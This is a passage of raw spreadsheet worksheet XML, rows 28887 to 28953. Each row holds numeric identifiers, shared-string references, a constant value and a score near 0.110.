    <row r="28887" ht="15.75" customHeight="1">
      <c r="A28887" s="1">
        <v>13252.0</v>
      </c>
      <c r="B28887" s="2">
        <v>3.4284765E7</v>
      </c>
      <c r="C28887" s="2" t="s">
        <v>27770</v>
      </c>
      <c r="D28887" s="2">
        <v>1.0</v>
      </c>
      <c r="E28887" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28887" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="28888" ht="15.75" customHeight="1">
      <c r="A28888" s="1">
        <v>13603.0</v>
      </c>
      <c r="B28888" s="2">
        <v>3.5802404E7</v>
      </c>
      <c r="C28888" s="2" t="s">
        <v>27771</v>
      </c>
      <c r="D28888" s="2">
        <v>1.0</v>
      </c>
      <c r="E28888" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28888" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="28889" ht="15.75" customHeight="1">
      <c r="A28889" s="1">
        <v>13942.0</v>
      </c>
      <c r="B28889" s="2">
        <v>3.7172484E7</v>
      </c>
      <c r="C28889" s="2" t="s">
        <v>27772</v>
      </c>
      <c r="D28889" s="2">
        <v>1.0</v>
      </c>
      <c r="E28889" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28889" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="28890" ht="15.75" customHeight="1">
      <c r="A28890" s="1">
        <v>16111.0</v>
      </c>
      <c r="B28890" s="2">
        <v>4.5400295E7</v>
      </c>
      <c r="C28890" s="2" t="s">
        <v>27773</v>
      </c>
      <c r="D28890" s="2">
        <v>1.0</v>
      </c>
      <c r="E28890" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28890" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="28891" ht="15.75" customHeight="1">
      <c r="A28891" s="1">
        <v>17033.0</v>
      </c>
      <c r="B28891" s="2">
        <v>4.850431E7</v>
      </c>
      <c r="C28891" s="2" t="s">
        <v>27774</v>
      </c>
      <c r="D28891" s="2">
        <v>1.0</v>
      </c>
      <c r="E28891" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28891" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="28892" ht="15.75" customHeight="1">
      <c r="A28892" s="1">
        <v>17469.0</v>
      </c>
      <c r="B28892" s="2">
        <v>4.9878183E7</v>
      </c>
      <c r="C28892" s="2" t="s">
        <v>27775</v>
      </c>
      <c r="D28892" s="2">
        <v>1.0</v>
      </c>
      <c r="E28892" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28892" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="28893" ht="15.75" customHeight="1">
      <c r="A28893" s="1">
        <v>18259.0</v>
      </c>
      <c r="B28893" s="2">
        <v>5.2188236E7</v>
      </c>
      <c r="C28893" s="2" t="s">
        <v>27776</v>
      </c>
      <c r="D28893" s="2">
        <v>1.0</v>
      </c>
      <c r="E28893" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28893" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="28894" ht="15.75" customHeight="1">
      <c r="A28894" s="1">
        <v>18445.0</v>
      </c>
      <c r="B28894" s="2">
        <v>5.2777446E7</v>
      </c>
      <c r="C28894" s="2" t="s">
        <v>27777</v>
      </c>
      <c r="D28894" s="2">
        <v>1.0</v>
      </c>
      <c r="E28894" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28894" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="28895" ht="15.75" customHeight="1">
      <c r="A28895" s="1">
        <v>18506.0</v>
      </c>
      <c r="B28895" s="2">
        <v>5.2963674E7</v>
      </c>
      <c r="C28895" s="2" t="s">
        <v>27778</v>
      </c>
      <c r="D28895" s="2">
        <v>1.0</v>
      </c>
      <c r="E28895" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28895" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="28896" ht="15.75" customHeight="1">
      <c r="A28896" s="1">
        <v>18545.0</v>
      </c>
      <c r="B28896" s="2">
        <v>5.3123121E7</v>
      </c>
      <c r="C28896" s="2" t="s">
        <v>27779</v>
      </c>
      <c r="D28896" s="2">
        <v>1.0</v>
      </c>
      <c r="E28896" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28896" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="28897" ht="15.75" customHeight="1">
      <c r="A28897" s="1">
        <v>19030.0</v>
      </c>
      <c r="B28897" s="2">
        <v>5.455289E7</v>
      </c>
      <c r="C28897" s="2" t="s">
        <v>27780</v>
      </c>
      <c r="D28897" s="2">
        <v>1.0</v>
      </c>
      <c r="E28897" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28897" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="28898" ht="15.75" customHeight="1">
      <c r="A28898" s="1">
        <v>19390.0</v>
      </c>
      <c r="B28898" s="2">
        <v>5.5542255E7</v>
      </c>
      <c r="C28898" s="2" t="s">
        <v>27781</v>
      </c>
      <c r="D28898" s="2">
        <v>1.0</v>
      </c>
      <c r="E28898" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28898" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="28899" ht="15.75" customHeight="1">
      <c r="A28899" s="1">
        <v>19502.0</v>
      </c>
      <c r="B28899" s="2">
        <v>5.5912645E7</v>
      </c>
      <c r="C28899" s="2" t="s">
        <v>27782</v>
      </c>
      <c r="D28899" s="2">
        <v>1.0</v>
      </c>
      <c r="E28899" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28899" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="28900" ht="15.75" customHeight="1">
      <c r="A28900" s="1">
        <v>19957.0</v>
      </c>
      <c r="B28900" s="2">
        <v>5.7531044E7</v>
      </c>
      <c r="C28900" s="2" t="s">
        <v>27783</v>
      </c>
      <c r="D28900" s="2">
        <v>1.0</v>
      </c>
      <c r="E28900" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28900" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="28901" ht="15.75" customHeight="1">
      <c r="A28901" s="1">
        <v>20032.0</v>
      </c>
      <c r="B28901" s="2">
        <v>7252702.0</v>
      </c>
      <c r="C28901" s="2" t="s">
        <v>27763</v>
      </c>
      <c r="D28901" s="2">
        <v>1.0</v>
      </c>
      <c r="E28901" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28901" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="28902" ht="15.75" customHeight="1">
      <c r="A28902" s="1">
        <v>21295.0</v>
      </c>
      <c r="B28902" s="2">
        <v>2.056733E7</v>
      </c>
      <c r="C28902" s="2" t="s">
        <v>27784</v>
      </c>
      <c r="D28902" s="2">
        <v>1.0</v>
      </c>
      <c r="E28902" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28902" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="28903" ht="15.75" customHeight="1">
      <c r="A28903" s="1">
        <v>22571.0</v>
      </c>
      <c r="B28903" s="2">
        <v>3.8581056E7</v>
      </c>
      <c r="C28903" s="2" t="s">
        <v>27785</v>
      </c>
      <c r="D28903" s="2">
        <v>1.0</v>
      </c>
      <c r="E28903" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28903" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="28904" ht="15.75" customHeight="1">
      <c r="A28904" s="1">
        <v>23476.0</v>
      </c>
      <c r="B28904" s="2">
        <v>5727671.0</v>
      </c>
      <c r="C28904" s="2" t="s">
        <v>27786</v>
      </c>
      <c r="D28904" s="2">
        <v>1.0</v>
      </c>
      <c r="E28904" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28904" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="28905" ht="15.75" customHeight="1">
      <c r="A28905" s="1">
        <v>25133.0</v>
      </c>
      <c r="B28905" s="2">
        <v>1.301877E7</v>
      </c>
      <c r="C28905" s="2" t="s">
        <v>27787</v>
      </c>
      <c r="D28905" s="2">
        <v>1.0</v>
      </c>
      <c r="E28905" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28905" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="28906" ht="15.75" customHeight="1">
      <c r="A28906" s="1">
        <v>25801.0</v>
      </c>
      <c r="B28906" s="2">
        <v>1.4709078E7</v>
      </c>
      <c r="C28906" s="2" t="s">
        <v>27788</v>
      </c>
      <c r="D28906" s="2">
        <v>1.0</v>
      </c>
      <c r="E28906" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28906" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="28907" ht="15.75" customHeight="1">
      <c r="A28907" s="1">
        <v>26729.0</v>
      </c>
      <c r="B28907" s="2">
        <v>1.8263342E7</v>
      </c>
      <c r="C28907" s="2" t="s">
        <v>27789</v>
      </c>
      <c r="D28907" s="2">
        <v>1.0</v>
      </c>
      <c r="E28907" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28907" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="28908" ht="15.75" customHeight="1">
      <c r="A28908" s="1">
        <v>26892.0</v>
      </c>
      <c r="B28908" s="2">
        <v>1.9254453E7</v>
      </c>
      <c r="C28908" s="2" t="s">
        <v>27790</v>
      </c>
      <c r="D28908" s="2">
        <v>1.0</v>
      </c>
      <c r="E28908" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28908" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="28909" ht="15.75" customHeight="1">
      <c r="A28909" s="1">
        <v>26930.0</v>
      </c>
      <c r="B28909" s="2">
        <v>1.9482235E7</v>
      </c>
      <c r="C28909" s="2" t="s">
        <v>27791</v>
      </c>
      <c r="D28909" s="2">
        <v>1.0</v>
      </c>
      <c r="E28909" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28909" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="28910" ht="15.75" customHeight="1">
      <c r="A28910" s="1">
        <v>27070.0</v>
      </c>
      <c r="B28910" s="2">
        <v>2.0421752E7</v>
      </c>
      <c r="C28910" s="2" t="s">
        <v>27792</v>
      </c>
      <c r="D28910" s="2">
        <v>1.0</v>
      </c>
      <c r="E28910" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28910" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="28911" ht="15.75" customHeight="1">
      <c r="A28911" s="1">
        <v>28460.0</v>
      </c>
      <c r="B28911" s="2">
        <v>2.661034E7</v>
      </c>
      <c r="C28911" s="2" t="s">
        <v>27793</v>
      </c>
      <c r="D28911" s="2">
        <v>1.0</v>
      </c>
      <c r="E28911" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28911" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="28912" ht="15.75" customHeight="1">
      <c r="A28912" s="1">
        <v>29415.0</v>
      </c>
      <c r="B28912" s="2">
        <v>3.213341E7</v>
      </c>
      <c r="C28912" s="2" t="s">
        <v>27794</v>
      </c>
      <c r="D28912" s="2">
        <v>1.0</v>
      </c>
      <c r="E28912" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28912" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="28913" ht="15.75" customHeight="1">
      <c r="A28913" s="1">
        <v>30723.0</v>
      </c>
      <c r="B28913" s="2">
        <v>4.3567888E7</v>
      </c>
      <c r="C28913" s="2" t="s">
        <v>27795</v>
      </c>
      <c r="D28913" s="2">
        <v>1.0</v>
      </c>
      <c r="E28913" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28913" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="28914" ht="15.75" customHeight="1">
      <c r="A28914" s="1">
        <v>32281.0</v>
      </c>
      <c r="B28914" s="2">
        <v>5534375.0</v>
      </c>
      <c r="C28914" s="2" t="s">
        <v>27796</v>
      </c>
      <c r="D28914" s="2">
        <v>1.0</v>
      </c>
      <c r="E28914" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28914" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="28915" ht="15.75" customHeight="1">
      <c r="A28915" s="1">
        <v>32810.0</v>
      </c>
      <c r="B28915" s="2">
        <v>6184377.0</v>
      </c>
      <c r="C28915" s="2" t="s">
        <v>27797</v>
      </c>
      <c r="D28915" s="2">
        <v>1.0</v>
      </c>
      <c r="E28915" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28915" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="28916" ht="15.75" customHeight="1">
      <c r="A28916" s="1">
        <v>33338.0</v>
      </c>
      <c r="B28916" s="2">
        <v>7591315.0</v>
      </c>
      <c r="C28916" s="2" t="s">
        <v>27798</v>
      </c>
      <c r="D28916" s="2">
        <v>1.0</v>
      </c>
      <c r="E28916" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28916" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="28917" ht="15.75" customHeight="1">
      <c r="A28917" s="1">
        <v>1691.0</v>
      </c>
      <c r="B28917" s="2">
        <v>2.8466059E7</v>
      </c>
      <c r="C28917" s="2" t="s">
        <v>27799</v>
      </c>
      <c r="D28917" s="2">
        <v>1.0</v>
      </c>
      <c r="E28917" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28917" s="2">
        <v>0.1101010101010101</v>
      </c>
    </row>
    <row r="28918" ht="15.75" customHeight="1">
      <c r="A28918" s="1">
        <v>2046.0</v>
      </c>
      <c r="B28918" s="2">
        <v>3.0932052E7</v>
      </c>
      <c r="C28918" s="2" t="s">
        <v>27800</v>
      </c>
      <c r="D28918" s="2">
        <v>1.0</v>
      </c>
      <c r="E28918" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28918" s="2">
        <v>0.1101010101010101</v>
      </c>
    </row>
    <row r="28919" ht="15.75" customHeight="1">
      <c r="A28919" s="1">
        <v>5258.0</v>
      </c>
      <c r="B28919" s="2">
        <v>4.5106229E7</v>
      </c>
      <c r="C28919" s="2" t="s">
        <v>27801</v>
      </c>
      <c r="D28919" s="2">
        <v>1.0</v>
      </c>
      <c r="E28919" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28919" s="2">
        <v>0.1101010101010101</v>
      </c>
    </row>
    <row r="28920" ht="15.75" customHeight="1">
      <c r="A28920" s="1">
        <v>9279.0</v>
      </c>
      <c r="B28920" s="2">
        <v>5.5518556E7</v>
      </c>
      <c r="C28920" s="2" t="s">
        <v>27802</v>
      </c>
      <c r="D28920" s="2">
        <v>1.0</v>
      </c>
      <c r="E28920" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28920" s="2">
        <v>0.1101010101010101</v>
      </c>
    </row>
    <row r="28921" ht="15.75" customHeight="1">
      <c r="A28921" s="1">
        <v>10717.0</v>
      </c>
      <c r="B28921" s="2">
        <v>1.5036953E7</v>
      </c>
      <c r="C28921" s="2" t="s">
        <v>27803</v>
      </c>
      <c r="D28921" s="2">
        <v>1.0</v>
      </c>
      <c r="E28921" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28921" s="2">
        <v>0.1101010101010101</v>
      </c>
    </row>
    <row r="28922" ht="15.75" customHeight="1">
      <c r="A28922" s="1">
        <v>11232.0</v>
      </c>
      <c r="B28922" s="2">
        <v>2.033778E7</v>
      </c>
      <c r="C28922" s="2" t="s">
        <v>27804</v>
      </c>
      <c r="D28922" s="2">
        <v>1.0</v>
      </c>
      <c r="E28922" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28922" s="2">
        <v>0.1101010101010101</v>
      </c>
    </row>
    <row r="28923" ht="15.75" customHeight="1">
      <c r="A28923" s="1">
        <v>12600.0</v>
      </c>
      <c r="B28923" s="2">
        <v>3.0082893E7</v>
      </c>
      <c r="C28923" s="2" t="s">
        <v>27805</v>
      </c>
      <c r="D28923" s="2">
        <v>1.0</v>
      </c>
      <c r="E28923" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28923" s="2">
        <v>0.1101010101010101</v>
      </c>
    </row>
    <row r="28924" ht="15.75" customHeight="1">
      <c r="A28924" s="1">
        <v>12766.0</v>
      </c>
      <c r="B28924" s="2">
        <v>3.1225441E7</v>
      </c>
      <c r="C28924" s="2" t="s">
        <v>27806</v>
      </c>
      <c r="D28924" s="2">
        <v>1.0</v>
      </c>
      <c r="E28924" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28924" s="2">
        <v>0.1101010101010101</v>
      </c>
    </row>
    <row r="28925" ht="15.75" customHeight="1">
      <c r="A28925" s="1">
        <v>13051.0</v>
      </c>
      <c r="B28925" s="2">
        <v>3.3161649E7</v>
      </c>
      <c r="C28925" s="2" t="s">
        <v>27807</v>
      </c>
      <c r="D28925" s="2">
        <v>1.0</v>
      </c>
      <c r="E28925" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28925" s="2">
        <v>0.1101010101010101</v>
      </c>
    </row>
    <row r="28926" ht="15.75" customHeight="1">
      <c r="A28926" s="1">
        <v>13720.0</v>
      </c>
      <c r="B28926" s="2">
        <v>3.6327968E7</v>
      </c>
      <c r="C28926" s="2" t="s">
        <v>27808</v>
      </c>
      <c r="D28926" s="2">
        <v>1.0</v>
      </c>
      <c r="E28926" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28926" s="2">
        <v>0.1101010101010101</v>
      </c>
    </row>
    <row r="28927" ht="15.75" customHeight="1">
      <c r="A28927" s="1">
        <v>15840.0</v>
      </c>
      <c r="B28927" s="2">
        <v>4.4397692E7</v>
      </c>
      <c r="C28927" s="2" t="s">
        <v>27809</v>
      </c>
      <c r="D28927" s="2">
        <v>1.0</v>
      </c>
      <c r="E28927" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28927" s="2">
        <v>0.1101010101010101</v>
      </c>
    </row>
    <row r="28928" ht="15.75" customHeight="1">
      <c r="A28928" s="1">
        <v>18468.0</v>
      </c>
      <c r="B28928" s="2">
        <v>5.2847441E7</v>
      </c>
      <c r="C28928" s="2" t="s">
        <v>27810</v>
      </c>
      <c r="D28928" s="2">
        <v>1.0</v>
      </c>
      <c r="E28928" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28928" s="2">
        <v>0.1101010101010101</v>
      </c>
    </row>
    <row r="28929" ht="15.75" customHeight="1">
      <c r="A28929" s="1">
        <v>19244.0</v>
      </c>
      <c r="B28929" s="2">
        <v>5.5091171E7</v>
      </c>
      <c r="C28929" s="2" t="s">
        <v>27811</v>
      </c>
      <c r="D28929" s="2">
        <v>1.0</v>
      </c>
      <c r="E28929" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28929" s="2">
        <v>0.1101010101010101</v>
      </c>
    </row>
    <row r="28930" ht="15.75" customHeight="1">
      <c r="A28930" s="1">
        <v>20005.0</v>
      </c>
      <c r="B28930" s="2">
        <v>5.773135E7</v>
      </c>
      <c r="C28930" s="2" t="s">
        <v>27812</v>
      </c>
      <c r="D28930" s="2">
        <v>1.0</v>
      </c>
      <c r="E28930" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28930" s="2">
        <v>0.1101010101010101</v>
      </c>
    </row>
    <row r="28931" ht="15.75" customHeight="1">
      <c r="A28931" s="1">
        <v>24245.0</v>
      </c>
      <c r="B28931" s="2">
        <v>1.0500615E7</v>
      </c>
      <c r="C28931" s="2" t="s">
        <v>27676</v>
      </c>
      <c r="D28931" s="2">
        <v>1.0</v>
      </c>
      <c r="E28931" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28931" s="2">
        <v>0.1101010101010101</v>
      </c>
    </row>
    <row r="28932" ht="15.75" customHeight="1">
      <c r="A28932" s="1">
        <v>25455.0</v>
      </c>
      <c r="B28932" s="2">
        <v>1.3934358E7</v>
      </c>
      <c r="C28932" s="2" t="s">
        <v>27813</v>
      </c>
      <c r="D28932" s="2">
        <v>1.0</v>
      </c>
      <c r="E28932" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28932" s="2">
        <v>0.1101010101010101</v>
      </c>
    </row>
    <row r="28933" ht="15.75" customHeight="1">
      <c r="A28933" s="1">
        <v>26448.0</v>
      </c>
      <c r="B28933" s="2">
        <v>1.7292156E7</v>
      </c>
      <c r="C28933" s="2" t="s">
        <v>27814</v>
      </c>
      <c r="D28933" s="2">
        <v>1.0</v>
      </c>
      <c r="E28933" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28933" s="2">
        <v>0.1101010101010101</v>
      </c>
    </row>
    <row r="28934" ht="15.75" customHeight="1">
      <c r="A28934" s="1">
        <v>28859.0</v>
      </c>
      <c r="B28934" s="2">
        <v>2.9045214E7</v>
      </c>
      <c r="C28934" s="2" t="s">
        <v>27815</v>
      </c>
      <c r="D28934" s="2">
        <v>1.0</v>
      </c>
      <c r="E28934" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28934" s="2">
        <v>0.1101010101010101</v>
      </c>
    </row>
    <row r="28935" ht="15.75" customHeight="1">
      <c r="A28935" s="1">
        <v>31481.0</v>
      </c>
      <c r="B28935" s="2">
        <v>5048683.0</v>
      </c>
      <c r="C28935" s="2" t="s">
        <v>27816</v>
      </c>
      <c r="D28935" s="2">
        <v>1.0</v>
      </c>
      <c r="E28935" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28935" s="2">
        <v>0.1101010101010101</v>
      </c>
    </row>
    <row r="28936" ht="15.75" customHeight="1">
      <c r="A28936" s="1">
        <v>31871.0</v>
      </c>
      <c r="B28936" s="2">
        <v>5285794.0</v>
      </c>
      <c r="C28936" s="2" t="s">
        <v>27817</v>
      </c>
      <c r="D28936" s="2">
        <v>1.0</v>
      </c>
      <c r="E28936" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28936" s="2">
        <v>0.1101010101010101</v>
      </c>
    </row>
    <row r="28937" ht="15.75" customHeight="1">
      <c r="A28937" s="1">
        <v>32120.0</v>
      </c>
      <c r="B28937" s="2">
        <v>5408285.0</v>
      </c>
      <c r="C28937" s="2" t="s">
        <v>27818</v>
      </c>
      <c r="D28937" s="2">
        <v>1.0</v>
      </c>
      <c r="E28937" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28937" s="2">
        <v>0.1101010101010101</v>
      </c>
    </row>
    <row r="28938" ht="15.75" customHeight="1">
      <c r="A28938" s="1">
        <v>32476.0</v>
      </c>
      <c r="B28938" s="2">
        <v>5.6903658E7</v>
      </c>
      <c r="C28938" s="2" t="s">
        <v>27819</v>
      </c>
      <c r="D28938" s="2">
        <v>1.0</v>
      </c>
      <c r="E28938" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28938" s="2">
        <v>0.1101010101010101</v>
      </c>
    </row>
    <row r="28939" ht="15.75" customHeight="1">
      <c r="A28939" s="1">
        <v>33154.0</v>
      </c>
      <c r="B28939" s="2">
        <v>7073032.0</v>
      </c>
      <c r="C28939" s="2" t="s">
        <v>27820</v>
      </c>
      <c r="D28939" s="2">
        <v>1.0</v>
      </c>
      <c r="E28939" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28939" s="2">
        <v>0.1101010101010101</v>
      </c>
    </row>
    <row r="28940" ht="15.75" customHeight="1">
      <c r="A28940" s="1">
        <v>33917.0</v>
      </c>
      <c r="B28940" s="2">
        <v>9240352.0</v>
      </c>
      <c r="C28940" s="2" t="s">
        <v>27821</v>
      </c>
      <c r="D28940" s="2">
        <v>1.0</v>
      </c>
      <c r="E28940" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28940" s="2">
        <v>0.1101010101010101</v>
      </c>
    </row>
    <row r="28941" ht="15.75" customHeight="1">
      <c r="A28941" s="1">
        <v>5864.0</v>
      </c>
      <c r="B28941" s="2">
        <v>4.7001618E7</v>
      </c>
      <c r="C28941" s="2" t="s">
        <v>27822</v>
      </c>
      <c r="D28941" s="2">
        <v>1.0</v>
      </c>
      <c r="E28941" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28941" s="2">
        <v>0.110082304526749</v>
      </c>
    </row>
    <row r="28942" ht="15.75" customHeight="1">
      <c r="A28942" s="1">
        <v>14339.0</v>
      </c>
      <c r="B28942" s="2">
        <v>3.8803939E7</v>
      </c>
      <c r="C28942" s="2" t="s">
        <v>27823</v>
      </c>
      <c r="D28942" s="2">
        <v>1.0</v>
      </c>
      <c r="E28942" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28942" s="2">
        <v>0.110082304526749</v>
      </c>
    </row>
    <row r="28943" ht="15.75" customHeight="1">
      <c r="A28943" s="1">
        <v>1812.0</v>
      </c>
      <c r="B28943" s="2">
        <v>2.9228123E7</v>
      </c>
      <c r="C28943" s="2" t="s">
        <v>27824</v>
      </c>
      <c r="D28943" s="2">
        <v>1.0</v>
      </c>
      <c r="E28943" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28943" s="2">
        <v>0.1100823045267489</v>
      </c>
    </row>
    <row r="28944" ht="15.75" customHeight="1">
      <c r="A28944" s="1">
        <v>3625.0</v>
      </c>
      <c r="B28944" s="2">
        <v>3.9209735E7</v>
      </c>
      <c r="C28944" s="2" t="s">
        <v>27825</v>
      </c>
      <c r="D28944" s="2">
        <v>1.0</v>
      </c>
      <c r="E28944" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28944" s="2">
        <v>0.1100823045267489</v>
      </c>
    </row>
    <row r="28945" ht="15.75" customHeight="1">
      <c r="A28945" s="1">
        <v>5322.0</v>
      </c>
      <c r="B28945" s="2">
        <v>4.5296453E7</v>
      </c>
      <c r="C28945" s="2" t="s">
        <v>27826</v>
      </c>
      <c r="D28945" s="2">
        <v>1.0</v>
      </c>
      <c r="E28945" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28945" s="2">
        <v>0.1100823045267489</v>
      </c>
    </row>
    <row r="28946" ht="15.75" customHeight="1">
      <c r="A28946" s="1">
        <v>5833.0</v>
      </c>
      <c r="B28946" s="2">
        <v>4.6905059E7</v>
      </c>
      <c r="C28946" s="2" t="s">
        <v>27827</v>
      </c>
      <c r="D28946" s="2">
        <v>1.0</v>
      </c>
      <c r="E28946" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28946" s="2">
        <v>0.1100823045267489</v>
      </c>
    </row>
    <row r="28947" ht="15.75" customHeight="1">
      <c r="A28947" s="1">
        <v>10547.0</v>
      </c>
      <c r="B28947" s="2">
        <v>1.2597216E7</v>
      </c>
      <c r="C28947" s="2" t="s">
        <v>27828</v>
      </c>
      <c r="D28947" s="2">
        <v>1.0</v>
      </c>
      <c r="E28947" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28947" s="2">
        <v>0.1100823045267489</v>
      </c>
    </row>
    <row r="28948" ht="15.75" customHeight="1">
      <c r="A28948" s="1">
        <v>10785.0</v>
      </c>
      <c r="B28948" s="2">
        <v>1.566912E7</v>
      </c>
      <c r="C28948" s="2" t="s">
        <v>27829</v>
      </c>
      <c r="D28948" s="2">
        <v>1.0</v>
      </c>
      <c r="E28948" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28948" s="2">
        <v>0.1100823045267489</v>
      </c>
    </row>
    <row r="28949" ht="15.75" customHeight="1">
      <c r="A28949" s="1">
        <v>13624.0</v>
      </c>
      <c r="B28949" s="2">
        <v>3.5878353E7</v>
      </c>
      <c r="C28949" s="2" t="s">
        <v>27830</v>
      </c>
      <c r="D28949" s="2">
        <v>1.0</v>
      </c>
      <c r="E28949" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28949" s="2">
        <v>0.1100823045267489</v>
      </c>
    </row>
    <row r="28950" ht="15.75" customHeight="1">
      <c r="A28950" s="1">
        <v>16494.0</v>
      </c>
      <c r="B28950" s="2">
        <v>4.655647E7</v>
      </c>
      <c r="C28950" s="2" t="s">
        <v>27831</v>
      </c>
      <c r="D28950" s="2">
        <v>1.0</v>
      </c>
      <c r="E28950" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28950" s="2">
        <v>0.1100823045267489</v>
      </c>
    </row>
    <row r="28951" ht="15.75" customHeight="1">
      <c r="A28951" s="1">
        <v>17554.0</v>
      </c>
      <c r="B28951" s="2">
        <v>5.0208837E7</v>
      </c>
      <c r="C28951" s="2" t="s">
        <v>27832</v>
      </c>
      <c r="D28951" s="2">
        <v>1.0</v>
      </c>
      <c r="E28951" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28951" s="2">
        <v>0.1100823045267489</v>
      </c>
    </row>
    <row r="28952" ht="15.75" customHeight="1">
      <c r="A28952" s="1">
        <v>17555.0</v>
      </c>
      <c r="B28952" s="2">
        <v>5.0208837E7</v>
      </c>
      <c r="C28952" s="2" t="s">
        <v>27833</v>
      </c>
      <c r="D28952" s="2">
        <v>1.0</v>
      </c>
      <c r="E28952" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28952" s="2">
        <v>0.1100823045267489</v>
      </c>
    </row>
    <row r="28953" ht="15.75" customHeight="1">
      <c r="A28953" s="1">
        <v>17924.0</v>
      </c>
      <c r="B28953" s="2">
        <v>5.1161436E7</v>
      </c>
      <c r="C28953" s="2" t="s">
        <v>27834</v>
      </c>
      <c r="D28953" s="2">
        <v>1.0</v>
      </c>
      <c r="E28953" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28953" s="2">
        <v>0.1100823045267489</v>
      </c>
    </row>
    <row r="28954" ht="15.75" customHeight="1">
